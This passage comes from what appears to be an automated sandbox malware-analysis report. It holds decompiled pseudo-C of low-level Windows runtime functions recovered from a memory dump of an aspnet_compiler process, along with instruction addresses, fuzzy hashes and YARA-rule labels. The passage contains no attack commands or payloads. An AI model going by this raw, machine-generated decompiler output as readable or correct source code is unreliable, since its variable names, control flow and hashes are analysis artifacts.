						E0126FA00(0x1338610, 0x12250a0, _t27, 0x1338610);
					}
				} else {
					L1:
					_t11 =  *0x1338614; // 0x0
					if(_t11 == 0) {
						_t11 = E01284886(0x1221088, 1, 0x1338614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01272581(0x1338610, (_t11 << 4) + 0x1225070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x012723b0
0x012723b6
0x01272409
0x01272415
0x012b5ae9
0x00000000
0x0127241b
0x0127241b
0x0127241d
0x01272427
0x0127242e
0x01272430
0x01272430
0x012723b8
0x012723b8
0x012723b8
0x012723bf
0x012723fc
0x012723fc
0x012723c1
0x012723c3
0x012723d0
0x012723d8
0x012723d8
0x012723dc
0x012723de
0x012723e1
0x012723e1
0x012723ec

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50b0428473ba40aada1079fc2338cd7f1eca62459de3bc502b195f331a83ef02
Instruction ID: e46ba07766e4eb430492b68dd93cc69aad6f13e9ff456ea615bd1a68965cf7a5
Opcode Fuzzy Hash: 50b0428473ba40aada1079fc2338cd7f1eca62459de3bc502b195f331a83ef02
Instruction Fuzzy Hash: 85112B31720352A7E730AB29AC91F2AB6DCFBA4720F14856AF702A7280C5B4D8418758

Uniqueness

Uniqueness Score: -1.00%

Function 012C46A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012C46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0128F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0127D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L012677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x012c46b7
0x012c46ba
0x012c46c5
0x012c46c8
0x012c46d0
0x012c46d4
0x012c46e6
0x012c46e9
0x012c46f4
0x012c46ff
0x012c4705
0x012c4706
0x012c470c
0x012c4713
0x012c471b
0x012c4723
0x012c4725
0x012c46d6
0x012c46d9
0x012c46db
0x012c46db
0x012c4732

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 749cedfdeb81714b8b1a8e9bf33a4491acdacb01cd88d2a6567cd54c31d332ba
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 29110272514248BFC705AF5C98808BEBBB9EF95300F10806EF98487351DA318D55C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 0124C962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0124C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x133d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0125EEF0(0x13370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E012CF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0125EB70(_t29, 0x13370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0128B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E012CF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x13370c0; // 0x0
					while(_t38 != 0x13370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x133b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0124c96a
0x0124c974
0x0124c988
0x0124c98a
0x012b7c9d
0x012b7c9f
0x012b7ca4
0x012b7cae
0x012b7cf0
0x012b7cf5
0x012b7cfa
0x0124c992
0x0124c996
0x0124c997
0x0124c998
0x0124c9a3
0x0124c9a3
0x012b7cb0
0x012b7cb7
0x012b7cbb
0x00000000
0x00000000
0x012b7cbd
0x012b7ce8
0x012b7cc5
0x012b7cc8
0x012b7cca
0x012b7cd0
0x012b7cd6
0x012b7cde
0x012b7ce4
0x012b7ce4
0x012b7cd0
0x00000000
0x012b7ce8
0x0124c990
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c231cde34b5bea1ac9d3772565992ffc769cdb42ffa2c6d8fae5e752abe2ce2f
Instruction ID: 3ddb6d6a8627044d53f2c9bf8e7b656a53c2f5e60068355dc2e257369d5f7d8c
Opcode Fuzzy Hash: c231cde34b5bea1ac9d3772565992ffc769cdb42ffa2c6d8fae5e752abe2ce2f
Instruction Fuzzy Hash: E511E1313206079BC761AF2CCDC5AABB7E5BBC4754F00052CEA41976A1DB60ED14C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 012837F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E012837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01262280(_t6, 0x1338550);
				}
				_t29 = E0128387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0125FFB0(0x1338550, _t27, 0x1338550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x012837fa
0x012837fc
0x01283805
0x01283808
0x01283808
0x01283814
0x01283818
0x01283846
0x01283848
0x0128384b
0x0128384b
0x01283852
0x00000000
0x01283854
0x01283856
0x00000000
0x00000000
0x01283863
0x00000000
0x01283863
0x0128381a
0x0128381a
0x0128381f
0x0128386e
0x0128386e
0x01283871
0x01283873
0x01283873
0x01283868
0x00000000
0x01283868
0x01283821
0x01283826
0x00000000
0x00000000
0x01283828
0x0128382a
0x01283841
0x00000000
0x01283841

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d225ff420e0e6d57b578b6a7c268716d87085f65e586ea9cbd04537efe1d1230
Instruction ID: a9460f4c2c1aec57ad3506bba8cb0752537a9f45f19e392fde87b5e07d763cba
Opcode Fuzzy Hash: d225ff420e0e6d57b578b6a7c268716d87085f65e586ea9cbd04537efe1d1230
Instruction Fuzzy Hash: 4301D6B29336129BC337EB1DD940E26BBAAFF85F60B154069EA458B296D734C801C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0127002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01267D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01267D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01267D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01267D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01270032
0x01270037
0x01270043
0x012b4b3a
0x01270049
0x01270049
0x01270049
0x0127004e
0x01270053
0x012b4b48
0x012b4b5a
0x012b4b4a
0x012b4b53
0x012b4b53
0x012b4b5f
0x00000000
0x012b4b61
0x00000000
0x012b4b61
0x01270059
0x01270059
0x01270060
0x012b4b6f
0x012b4b6f
0x01270069
0x012b4b83
0x00000000
0x00000000
0x012b4b90
0x012b4b9b
0x012b4b9b
0x012b4ba4
0x00000000
0x00000000
0x012b4baa
0x00000000
0x0127006f
0x0127006f
0x00000000
0x0127006f
0x01270069

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 2fcbd30a7734bf078e6748cb527f777f0562c43768185f99636ecf769ccfd4b8
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: C111E532A316C28FE723A76CC5D5B767798AB527E8F0900A0EF0587693E778D841C254

Uniqueness

Uniqueness Score: -1.00%

Function 0125766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0125766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0127F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0127F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01264620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x01257672
0x0125767f
0x01257689
0x012576de
0x012576de
0x0125768b
0x01257691
0x01257693
0x01257697
0x00000000
0x01257699
0x012576a8
0x00000000
0x012576aa
0x012576ad
0x012576b1
0x00000000
0x012576b3
0x012576b3
0x012576b5
0x012576ba
0x012576bc
0x012576bc
0x012576c0
0x00000000
0x012576c2
0x012576ce
0x012576ce
0x012576c0
0x012576b1
0x012576a8
0x01257697
0x012576d9

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: f4b17aa755645b9706aec7bf6de34a4fa48bdf4612df3f7e7277c1a9cbbf753c
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 91018432760119AFD7609E5FCD91E6B7BADEB94660B680524BE18CB250DA30DD0187B0

Uniqueness

Uniqueness Score: -1.00%

Function 01249080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01249080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x13385ec;
				E01262280(_t48, 0x13385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0125FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x133538c; // 0x773a6828
					if( *_t84 != 0x1335388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x131f6e8);
						E0129D0E8(0x13385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E013188F5(_t80, _t85, 0x1335388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x13386c0; // 0xdf07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x13386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01262280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E013188F5(0x13385ec, _t85, 0x1335388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0128AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x133b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x13384c0;
																			if(_t82 >=  *0x13384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01319063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0124922A(_t99);
										_t64 = E01267D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01318B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x13386c0; // 0xdf07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x13386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x13386bc;
													_t87 = 0x13386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01249240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x13386c4;
												_t87 = 0x13386c0;
												L27:
												E01279B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0129D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1335388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x133538c = _t51;
						goto L6;
					}
				}
			}

0x01249082
0x01249083
0x01249084
0x01249085
0x01249087
0x01249096
0x01249098
0x01249098
0x0124909e
0x012490a8
0x012490e7
0x012490e7
0x012490aa
0x012490b0
0x012490b7
0x012490bd
0x012490dd
0x012490e6
0x012490bf
0x012490bf
0x012490c7
0x012490cf
0x012490f1
0x012490f2
0x012490f4
0x012490f5
0x012490f6
0x012490f7
0x012490f8
0x012490f9
0x012490fa
0x012490fb
0x012490fc
0x012490fd
0x012490fe
0x012490ff
0x01249100
0x01249102
0x01249107
0x0124910c
0x01249110
0x01249113
0x01249115
0x01249136
0x0124913f
0x01249143
0x012a37e4
0x012a37e4
0x01249117
0x01249117
0x0124911d
0x00000000
0x0124911f
0x0124911f
0x01249125
0x00000000
0x01249127
0x0124912d
0x01249130
0x01249134
0x01249158
0x0124915d
0x01249161
0x01249168
0x012a3715
0x0124916e
0x0124916e
0x01249175
0x01249177
0x0124917e
0x0124917f
0x01249182
0x01249182
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x01249198
0x01249198
0x01249198
0x0124919a
0x00000000
0x00000000
0x012a371f
0x012a3721
0x012a3727
0x012a372f
0x012a3733
0x012a3735
0x012a3738
0x012a373b
0x012a373d
0x012a3740
0x00000000
0x012a3746
0x012a3746
0x012a3749
0x00000000
0x012a374f
0x012a374f
0x012a3751
0x012a3757
0x012a3759
0x012a375c
0x012a375c
0x012a375e
0x012a375e
0x012a3761
0x012a3764
0x00000000
0x00000000
0x012a3766
0x012a3768
0x012a37a3
0x012a37a3
0x012a37a5
0x012a37a7
0x012a37ad
0x012a37b0
0x012a37b2
0x012a37bc
0x012a37c2
0x012a37c2
0x012a37b2
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x00000000
0x01249195
0x00000000
0x012a376a
0x012a376a
0x012a376a
0x012a376c
0x012a376c
0x012a376f
0x012a3775
0x00000000
0x00000000
0x012a3777
0x012a3779
0x012a3782
0x012a3787
0x012a3789
0x012a3790
0x012a3790
0x012a378b
0x012a378b
0x012a378b
0x012a3792
0x012a3795
0x00000000
0x012a3795
0x00000000
0x012a3779
0x012a3798
0x00000000
0x012a3798
0x00000000
0x012a3768
0x012a379b
0x012a379b
0x012a3751
0x012a3749
0x00000000
0x012a3740
0x012491a0
0x012491a3
0x012491a9
0x012491b0
0x00000000
0x012491b0
0x01249187
0x012491b4
0x012491b4
0x012491bb
0x012491c0
0x012491c5
0x012491c7
0x012a37da
0x012491cd
0x012491cd
0x012491cd
0x012491d2
0x012491d5
0x01249239
0x01249239
0x012491d7
0x012491db
0x012491e1
0x012491e7
0x012491fd
0x01249203
0x0124921e
0x01249223
0x00000000
0x01249205
0x01249205
0x01249208
0x0124920c
0x01249214
0x01249214
0x0124920c
0x012491e9
0x012491e9
0x012491ee
0x012491f3
0x012491f3
0x012491f3
0x012491e7
0x00000000
0x00000000
0x00000000
0x01249134
0x01249125
0x0124911d
0x0124914e
0x012490d1
0x012490d1
0x012490d3
0x012490d6
0x012490d8
0x00000000
0x012490d8
0x012490cf

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ba23ae9c568329c6dc079082cd0bd5b7d0291aae6f3f47f7de66343b12bc13
Instruction ID: 4c07182e1c92626446cf9732b829456efcf7013872087dd6708a4e0dfa28eb88
Opcode Fuzzy Hash: 31ba23ae9c568329c6dc079082cd0bd5b7d0291aae6f3f47f7de66343b12bc13
Instruction Fuzzy Hash: C301FF72621201CFDB298F08D840B22BBE9EF89329F215066E6018B692C374DC81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012DC450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E012DC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01289910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E012895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E012895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E012895D0();
				return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x012dc458
0x012dc45d
0x012dc466
0x012dc468
0x012dc469
0x012dc46a
0x012dc46b
0x012dc46e
0x012dc46f
0x012dc471
0x012dc476
0x012dc476
0x012dc47c
0x012dc47e
0x012dc480
0x012dc480
0x012dc483
0x012dc484
0x012dc486
0x012dc488
0x012dc48f
0x012dc491
0x012dc493
0x012dc493
0x012dc48f
0x012dc498
0x012dc49e
0x012dc4ad
0x012dc4ad
0x012dc4b2
0x012dc4b4
0x012dc4cd

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: b089fb0fb3c9843da2212731fbd038b1ef6b2160df1c7d697f2d3bd5e7042ef0
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 70019272150506BFEB25AF69DC80E72FB6DFFA4394F004529F214425A0CB25ACA1CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 01314015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01314015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01262280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01262280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13386ac);
					E0124F900(0x13386d4, _t28);
					E0125FFB0(0x13386ac, _t28, 0x13386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0125FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0131401a
0x0131401e
0x01314023
0x01314028
0x01314029
0x0131402b
0x0131402f
0x01314043
0x01314046
0x01314051
0x01314057
0x0131405f
0x01314062
0x01314067
0x0131406f
0x0131407c
0x0131407c
0x0131408c
0x0131408c
0x01314097

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6038a8ac7b6acf17b6c27ca3d99c7f572b762e49e9d2c676496bd8ad7f9ba189
Instruction ID: e464c3e7d45647091aa881eacb30ca00fc1fc3d5be4a56b41af9ab35c06aad9f
Opcode Fuzzy Hash: 6038a8ac7b6acf17b6c27ca3d99c7f572b762e49e9d2c676496bd8ad7f9ba189
Instruction Fuzzy Hash: 4E018471211546BFD355AB69CE80E23F7ACFB95664B000229F50883A51CB38EC51C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0130138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0130138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
